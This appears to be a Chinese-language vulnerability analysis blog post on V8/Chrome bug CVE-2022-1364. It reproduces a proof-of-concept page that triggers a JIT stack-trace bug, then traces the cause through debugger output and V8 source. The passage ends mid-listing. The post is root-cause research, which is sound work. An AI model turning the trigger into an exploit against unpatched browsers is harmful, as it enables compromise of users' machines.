</code></pre></div></div>]]></content><author><name></name></author><category term="7zip" /><category term="ZDI-24-1532" /><summary type="html"><![CDATA[分析一下 7zip 漏洞 CVE-2024-11477/ZDI-24-1532，查看 ZDI 公告 提取到关键点： 24.07 修复，之前的版本有问题：那么我们 DIFF 24.07 和 24.06 的代码 漏洞出现在 Zstandard 解压的代码中]]></summary></entry><entry><title type="html">分析 CVE-2022-1363</title><link href="https://pwntips.github.io/2023/05/07/CVE-2022-1364.html" rel="alternate" type="text/html" title="分析 CVE-2022-1363" /><published>2023-05-07T00:00:00+08:00</published><updated>2023-05-07T00:00:00+08:00</updated><id>https://pwntips.github.io/2023/05/07/CVE-2022-1364</id><content type="html" xml:base="https://pwntips.github.io/2023/05/07/CVE-2022-1364.html"><![CDATA[<p>从 https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-1364.html 得到漏洞影响的 Chrome 版本以及 POC 代码。</p>

<h2 id="复现">复现</h2>

<p>从 https://vikyd.github.io/download-chromium-history-version/#/ 搜索到一个距修复版本比较近的版本 100.0.4896.124 的官方备份 https://commondatastorage.googleapis.com/chromium-browser-snapshots/index.html?prefix=Win_x64/972766/</p>

<p>./Chrome.exe –js-flags=”–allow-natives-syntax” –no-sandbox –enable-logging=stderr 启动 Chrome，访问 POC 页面 index.html。</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;body&gt;</span>
<span class="nt">&lt;script&gt;</span>
        <span class="kd">function</span> <span class="nx">foo</span><span class="p">(</span><span class="nx">bug</span><span class="p">)</span> <span class="p">{</span>
  <span class="kd">function</span> <span class="nx">C</span><span class="p">(</span><span class="nx">z</span><span class="p">)</span> <span class="p">{</span>
    <span class="nb">Error</span><span class="p">.</span><span class="nx">prepareStackTrace</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">t</span><span class="p">,</span> <span class="nx">B</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">return</span> <span class="nx">B</span><span class="p">[</span><span class="nx">z</span><span class="p">].</span><span class="nx">getThis</span><span class="p">();</span>
    <span class="p">};</span>
    <span class="kd">let</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">Error</span><span class="p">().</span><span class="nx">stack</span><span class="p">;</span>
    <span class="nb">Error</span><span class="p">.</span><span class="nx">prepareStackTrace</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
    <span class="k">return</span> <span class="nx">p</span><span class="p">;</span>
  <span class="p">}</span>
  <span class="kd">function</span> <span class="nx">J</span><span class="p">()</span> <span class="p">{}</span>
  <span class="kd">var</span> <span class="nx">optim</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
  <span class="kd">var</span> <span class="nx">opt</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span>
      <span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">c</span><span class="dl">'</span><span class="p">,</span>
      <span class="dl">'</span><span class="s1">if(typeof a===</span><span class="se">\'</span><span class="s1">number</span><span class="se">\'</span><span class="s1">){if(a&gt;2){for(var i=0;i&lt;100;i++);return;}b.d(a,b,1);return}</span><span class="dl">'</span> <span class="o">+</span>
          <span class="dl">'</span><span class="s1">g++;</span><span class="dl">'</span><span class="p">.</span><span class="nx">repeat</span><span class="p">(</span><span class="mi">70</span><span class="p">));</span>
  <span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">d</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span>
      <span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">"use strict";b.a.call(arguments,b);return arguments[a];</span><span class="dl">'</span><span class="p">);</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">a</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span><span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">a.b(0,a)</span><span class="dl">'</span><span class="p">);</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">b</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Function</span><span class="p">(</span>
      <span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">b</span><span class="dl">'</span><span class="p">,</span>
      <span class="dl">'</span><span class="s1">b.c();if(a){</span><span class="dl">'</span> <span class="o">+</span>
          <span class="dl">'</span><span class="s1">g++;</span><span class="dl">'</span><span class="p">.</span><span class="nx">repeat</span><span class="p">(</span><span class="mi">70</span><span class="p">)</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">}</span><span class="dl">'</span><span class="p">);</span>
  <span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">c</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="nx">optim</span><span class="p">)</span> <span class="p">{</span>
      <span class="kd">var</span> <span class="nx">z</span> <span class="o">=</span> <span class="nx">C</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
      <span class="kd">var</span> <span class="nx">p</span> <span class="o">=</span> <span class="nx">C</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
      <span class="nx">z</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
      <span class="nx">e</span> <span class="o">=</span> <span class="p">{</span><span class="na">M</span><span class="p">:</span> <span class="nx">z</span><span class="p">,</span> <span class="na">C</span><span class="p">:</span> <span class="nx">p</span><span class="p">};</span>
    <span class="p">}</span>
  <span class="p">};</span>
  <span class="kd">var</span> <span class="nx">a</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">J</span><span class="p">();</span>
  <span class="c1">// jit optim</span>
  <span class="k">if</span> <span class="p">(</span><span class="nx">bug</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">V</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="mi">1</span><span class="nx">E4</span> <span class="o">&gt;</span> <span class="nx">V</span><span class="p">;</span> <span class="nx">V</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
       <span class="nx">opt</span><span class="p">(</span><span class="mi">0</span> <span class="o">==</span> <span class="nx">V</span> <span class="o">%</span> <span class="mi">4</span> <span class="p">?</span> <span class="mi">1</span> <span class="p">:</span> <span class="mi">4</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
  <span class="p">}</span>
  <span class="nx">optim</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span>
  <span class="nx">opt</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
  <span class="k">return</span> <span class="nx">e</span><span class="p">;</span>
<span class="p">}</span>

<span class="nx">e1</span> <span class="o">=</span> <span class="nx">foo</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">e1</span><span class="p">.</span><span class="nx">M</span> <span class="o">===</span> <span class="nx">e1</span><span class="p">.</span><span class="nx">C</span><span class="p">);</span> <span class="c1">// prints true.</span>
<span class="nx">e2</span> <span class="o">=</span> <span class="nx">foo</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">e2</span><span class="p">.</span><span class="nx">M</span> <span class="o">===</span> <span class="nx">e2</span><span class="p">.</span><span class="nx">C</span><span class="p">);</span> <span class="c1">// should be true as above but prints false.</span>
<span class="nt">&lt;/script&gt;</span>
<span class="nt">&lt;/body&gt;</span>
</code></pre></div></div>

<p>可以看到，两次 console.log 分别输出 true 和 false。</p>

<h2 id="分析">分析</h2>

<p>先简单看下 POC 代码，e1 和 e2  的来源其实是 J.prototype.c 函数中的 e，可以看到 e.M 和 e.C 都是函数调用 C(3)  的返回值，再看函数 C，看起来像是在获取当前的调用栈，在临近的位置调用两次 C 函数，另外还可以看到两次 foo 函数调用的不同之处，主要在是否对 opt 函数进行 JIT 编译。</p>

<p>先看函数 C，里面用到了 Error 和 StackTrace 相关的 API，搜索到一篇相关的介绍 https://v8.dev/docs/stack-trace-api ，读了以后了解到，Error 对象的 stack 属性，可以用来读 Error 创建时的调用栈，这个 stack 属性是在第一次被读取时，使用 Error.prepareStackTrace 函数生成的，Error.prepareStackTrace 的两个参数分别是 Error 对象和  structuredStackTrace。structuredStackTrace 是 Callsite 对象的数组，Callsite 就记录着每一层的栈帧信息，Callsite 的 getThis 方法就可以获取到栈帧对应的 this 对象。修改 Error.prepareStackTrace 就可以自定义 stack 属性的生成。</p>

<p>这样的话在临近位置，连续调用函数 C 返回的应该就是同一层栈帧对应的 this 对象。e2.M === e2.C 应该像注释中描述的也为 true 才对。继续分析 opt 函数的 JIT 编译做了哪些优化，为什么改变了这个结果。</p>

<p>用 ./Chrome.exe –js-flags=”–allow-natives-syntax –trace-turbo” –no-sandbox –enable-logging=stderr 命令重新启动 chrome，访问 POC 页面后，得到编译过程的 trace 日志 <a href="/assets/images/turbo-000000B00023E8B4-0%201.json">turbo-000000B00023E8B4-0 1.json</a>，用 <a href="https://v8.github.io/tools/head/turbolizer/index.html">v8 turbolizer</a> 打开</p>

<p>opt 函数整理一下，可以写成下面的形式：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">opt</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="nx">b</span><span class="p">,</span><span class="nx">c</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="k">typeof</span> <span class="nx">a</span> <span class="o">===</span><span class="dl">'</span><span class="s1">number</span><span class="dl">'</span><span class="p">){</span>
	    <span class="k">if</span><span class="p">(</span><span class="nx">a</span><span class="o">&gt;</span><span class="mi">2</span><span class="p">){</span>
		    <span class="k">for</span><span class="p">(</span><span class="nx">vari</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nx">i</span><span class="o">&lt;</span><span class="mi">100</span><span class="p">;</span><span class="nx">i</span><span class="o">++</span><span class="p">)</span>
		        <span class="p">;</span>
			<span class="k">return</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="nx">b</span><span class="p">.</span><span class="nx">d</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="nx">b</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
		<span class="k">return</span><span class="p">;</span>
	<span class="p">}</span>
		    <span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>其中 b.d 就是 j.prototype.d 可以整理成：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">d</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">use</span> <span class="nx">strict</span><span class="p">;</span>
    <span class="nx">b</span><span class="p">.</span><span class="nx">a</span><span class="p">.</span><span class="nx">call</span><span class="p">(</span><span class="nx">arguments</span><span class="p">,</span> <span class="nx">b</span><span class="p">);</span>
    <span class="k">return</span> <span class="nx">arguments</span><span class="p">[</span><span class="nx">a</span><span class="p">];</span>
<span class="p">}</span>
</code></pre></div></div>

<p>b.a 就是 j.prototype.a 可以整理成：
function (a) {
    a.b(0, a);
}</p>

<p>a.b 就是 j.prototype.b 可以整理成：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">b</span><span class="p">.</span><span class="nx">c</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;</span><span class="nx">g</span><span class="o">++</span><span class="p">;....</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>b.c 就是 J.prototype.c 整理成：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
  <span class="k">if</span> <span class="p">(</span><span class="nx">optim</span><span class="p">)</span> <span class="p">{</span>
      <span class="kd">var</span> <span class="nx">z</span> <span class="o">=</span> <span class="nx">C</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
      <span class="kd">var</span> <span class="nx">p</span> <span class="o">=</span> <span class="nx">C</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
      <span class="nx">z</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
      <span class="nx">e</span> <span class="o">=</span> <span class="p">{</span><span class="na">M</span><span class="p">:</span> <span class="nx">z</span><span class="p">,</span> <span class="na">C</span><span class="p">:</span> <span class="nx">p</span><span class="p">};</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>C 函数中的 Error().stack 抓到的调用栈应该是下面这样的：</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">C</span><span class="p">()</span>
<span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">c</span><span class="p">()</span>
<span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">b</span><span class="p">()</span>
<span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">a</span><span class="p">()</span>
<span class="nx">J</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">d</span><span class="p">()</span>
<span class="nx">opt</span><span class="p">()</span>
</code></pre></div></div>

<p>那么 <code class="language-plaintext highlighter-rouge">B[z].getThis()</code> 获取到的就是 <code class="language-plaintext highlighter-rouge">J.prototype.a</code> 这一层调用的 <code class="language-plaintext highlighter-rouge">this</code>，也就是 <code class="language-plaintext highlighter-rouge">J.prototype.d</code> 函数中通过 <code class="language-plaintext highlighter-rouge">call</code> 函数指定的 <code class="language-plaintext highlighter-rouge">arguments</code> 对象, 应该是数组 <code class="language-plaintext highlighter-rouge">[1, globalThis.a, 1]</code></p>

<p>在调试器里跟踪一下 <code class="language-plaintext highlighter-rouge">Error</code> 对象的相关流程，学习一下 <code class="language-plaintext highlighter-rouge">Error</code> 对象的实现。
加入一个 <code class="language-plaintext highlighter-rouge">%SystemBreak()</code> 函数调用，让程序在构建调用栈时断下。</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">Error</span><span class="p">.</span><span class="nx">prepareStackTrace</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">t</span><span class="p">,</span> <span class="nx">B</span><span class="p">)</span> <span class="p">{</span>
		<span class="o">%</span><span class="nx">SystemBreak</span><span class="p">();</span>
      <span class="k">return</span> <span class="nx">B</span><span class="p">[</span><span class="nx">z</span><span class="p">].</span><span class="nx">getThis</span><span class="p">();</span>
<span class="p">};</span>
</code></pre></div></div>

<p>得到如下调用栈</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span>	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">base</span><span class="o">::</span><span class="n">OS</span><span class="o">::</span><span class="n">DebugBreak</span><span class="p">()</span>
 	<span class="p">[</span><span class="n">Inline</span> <span class="n">Frame</span><span class="p">]</span> <span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">__RT_impl_Runtime_SystemBreak</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Runtime_SystemBreak</span><span class="p">(</span><span class="kt">int</span><span class="p">)</span>
 	<span class="mo">00007</span><span class="n">ffb1fecbcb7</span><span class="p">()</span>	<span class="n">Unknown</span>
 	<span class="mo">00007</span><span class="n">ffb1ff6d5cb</span><span class="p">()</span>	<span class="n">Unknown</span>
 	<span class="mo">00007</span><span class="n">ffb1fe4c9e2</span><span class="p">()</span>	<span class="n">Unknown</span>
 	<span class="mo">00007</span><span class="n">ffb1fe4aa1c</span><span class="p">()</span>	<span class="n">Unknown</span>
 	<span class="mo">00007</span><span class="n">ffb1fe4a61b</span><span class="p">()</span>	<span class="n">Unknown</span>
 	<span class="p">[</span><span class="n">Inline</span> <span class="n">Frame</span><span class="p">]</span> <span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">GeneratedCode</span><span class="o">&lt;</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">,</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">,</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">,</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">,</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">,</span><span class="kt">long</span> <span class="kt">long</span><span class="p">,</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span> <span class="o">**&gt;::</span><span class="n">Call</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">__int64</span><span class="p">)</span> <span class="n">Line</span> <span class="mi">156</span>	<span class="n">C</span><span class="o">++</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="err">`</span><span class="n">anonymous</span> <span class="k">namespace</span><span class="err">'</span><span class="o">::</span><span class="n">Invoke</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Execution</span><span class="o">::</span><span class="n">Call</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">ErrorUtils</span><span class="o">::</span><span class="n">FormatStackTrace</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">ErrorUtils</span><span class="o">::</span><span class="n">GetFormattedStack</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Accessors</span><span class="o">::</span><span class="n">ErrorStackGetter</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">Local</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">Name</span><span class="o">&gt;</span><span class="p">)</span> 
 	<span class="p">[</span><span class="n">Inline</span> <span class="n">Frame</span><span class="p">]</span> <span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">PropertyCallbackArguments</span><span class="o">::</span><span class="n">BasicCallNamedGetterCallback</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">PropertyCallbackArguments</span><span class="o">::</span><span class="n">CallAccessorGetter</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Object</span><span class="o">::</span><span class="n">GetPropertyWithAccessor</span><span class="p">()</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Object</span><span class="o">::</span><span class="n">GetProperty</span><span class="p">(</span><span class="kt">bool</span><span class="p">)</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">LoadIC</span><span class="o">::</span><span class="n">Load</span><span class="p">(</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Handle</span><span class="o">&lt;</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Object</span><span class="o">&gt;</span><span class="p">)</span> 
 	<span class="p">[</span><span class="n">Inline</span> <span class="n">Frame</span><span class="p">]</span> <span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">__RT_impl_Runtime_LoadNoFeedbackIC_Miss</span><span class="p">(</span>
 	<span class="n">chrome</span><span class="p">.</span><span class="n">dll</span><span class="o">!</span><span class="n">v8</span><span class="o">::</span><span class="n">internal</span><span class="o">::</span><span class="n">Runtime_LoadNoFeedbackIC_Miss</span><span class="p">(</span><span class="kt">int</span><span class="p">)</span>
 	<span class="p">...</span>
</code></pre></div></div>

<p>可以看出 <code class="language-plaintext highlighter-rouge">Error.stack</code> 属性是一个 <code class="language-plaintext highlighter-rouge">accessor</code>，对这个属性的访问，触发了对应了 <code class="language-plaintext highlighter-rouge">ErrorStackGetter</code> 函数的执行，继续浏览调用栈，可以看到一个 <code class="language-plaintext highlighter-rouge">FormatStackTrace</code> 函数，这个函数的实现跟之前读到的文档的内容可以匹配上，程序先创建了一个 <code class="language-plaintext highlighter-rouge">CallSite</code> 对象的数组，然后用这个数组作为参数，调用了 <code class="language-plaintext highlighter-rouge">prepareStackTrace</code> 函数。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// static</span>
<span class="n">MaybeHandle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">ErrorUtils</span><span class="o">::</span><span class="n">GetFormattedStack</span><span class="p">(</span>
    <span class="n">Isolate</span><span class="o">*</span> <span class="n">isolate</span><span class="p">,</span> <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSObject</span><span class="o">&gt;</span> <span class="n">error_object</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">TRACE_EVENT0</span><span class="p">(</span><span class="n">TRACE_DISABLED_BY_DEFAULT</span><span class="p">(</span><span class="s">"v8.stack_trace"</span><span class="p">),</span> <span class="n">__func__</span><span class="p">);</span>

  <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">error_stack</span> <span class="o">=</span> <span class="n">JSReceiver</span><span class="o">::</span><span class="n">GetDataProperty</span><span class="p">(</span>
      <span class="n">error_object</span><span class="p">,</span> <span class="n">isolate</span><span class="o">-&gt;</span><span class="n">factory</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">error_stack_symbol</span><span class="p">());</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">error_stack</span><span class="o">-&gt;</span><span class="n">IsErrorStackData</span><span class="p">())</span> <span class="p">{</span>
    <span class="p">....</span>
    <span class="k">return</span> <span class="n">formatted_stack</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">error_stack</span><span class="o">-&gt;</span><span class="n">IsFixedArray</span><span class="p">())</span> <span class="p">{</span>
    <span class="c1">///&gt;&gt;&gt;&gt; 程序走到这里</span>
    <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">formatted_stack</span><span class="p">;</span>
    <span class="n">ASSIGN_RETURN_ON_EXCEPTION</span><span class="p">(</span>
        <span class="n">isolate</span><span class="p">,</span> <span class="n">formatted_stack</span><span class="p">,</span>
        <span class="n">FormatStackTrace</span><span class="p">(</span><span class="n">isolate</span><span class="p">,</span> <span class="n">error_object</span><span class="p">,</span>
                         <span class="n">Handle</span><span class="o">&lt;</span><span class="n">FixedArray</span><span class="o">&gt;::</span><span class="n">cast</span><span class="p">(</span><span class="n">error_stack</span><span class="p">)),</span>
        <span class="n">Object</span><span class="p">);</span>
    <span class="n">RETURN_ON_EXCEPTION</span><span class="p">(</span>
        <span class="n">isolate</span><span class="p">,</span>
